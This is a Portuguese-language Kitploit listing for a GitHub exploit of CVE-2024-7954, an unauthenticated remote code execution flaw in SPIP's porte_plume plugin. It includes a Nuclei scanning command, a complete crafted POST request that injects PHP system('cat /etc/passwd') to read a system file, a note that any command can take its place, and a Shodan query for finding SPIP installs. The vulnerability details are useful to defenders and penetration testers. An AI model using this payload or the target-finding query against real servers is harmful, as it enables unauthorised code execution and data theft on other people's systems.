Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
RCE-CVE-2024-7954 — Exploit para CVE-2024-7954, um RCE crítico no plugin porte_plume do SPIP, com uma solicitação HTTP elaborada e template Nuclei para varredura automatizada. | Kitploit
Ferramentas/GitHubGitHub/arthikw3b/rce-cve-2024-7954
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubarthikw3b/rce-cve-2024-7954

RCE-CVE-2024-7954

Exploit para CVE-2024-7954, um RCE crítico no plugin porte_plume do SPIP, com uma solicitação HTTP elaborada e template Nuclei para varredura automatizada.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

RCE-CVE-2024-7954

Descrição

O plugin porte_plume, utilizado por versões do SPIP anteriores a 4.30-alpha2, 4.2.13 e 4.1.16, é suscetível a uma vulnerabilidade crítica de execução arbitrária de código (RCE). Esta falha permite que um atacante remoto não autenticado execute código PHP arbitrário como o usuário do SPIP ao elaborar uma requisição HTTP específica. O potencial de exploração é severo, permitindo que atacantes executem comandos maliciosos no servidor, o que pode levar a acesso não autorizado, violações de dados ou comprometimento adicional do sistema.

Detalhes da Vulnerabilidade

  • Software Afetado: SPIP (anterior às versões 4.30-alpha2, 4.2.13 e 4.1.16)
  • Tipo de Vulnerabilidade: Execução Remota de Código (RCE)
  • Nível de Gravidade: Crítico
  • Explorabilidade: Atacantes remotos e não autenticados podem explorar esta vulnerabilidade.

Exploit

Varredura com Nuclei

root@kitploit:~
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml

Um exemplo de uma requisição HTTP manipulada que pode ser usada para explorar esta vulnerabilidade é:

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

Explicação do Exploit:

  • A requisição POST é direcionada para a ação porte_plume_previsu do arquivo index.php do SPIP.
  • O parâmetro data contém um payload que utiliza a função system() do PHP para executar um comando (neste caso, cat /etc/passwd), que lê o conteúdo do arquivo de senhas.
  • Ao alterar o comando dentro da função system(), um atacante poderia executar qualquer código PHP no servidor, levando a consequências graves.

Shodan Dork

Para identificar instalações SPIP potencialmente vulneráveis, a seguinte consulta de busca no Shodan pode ser usada:

root@kitploit:~
app="SPIP"

Esta vulnerabilidade ressalta a importância de manter o software atualizado e implementar medidas de segurança robustas para se proteger contra exploração.

Baixar ferramenta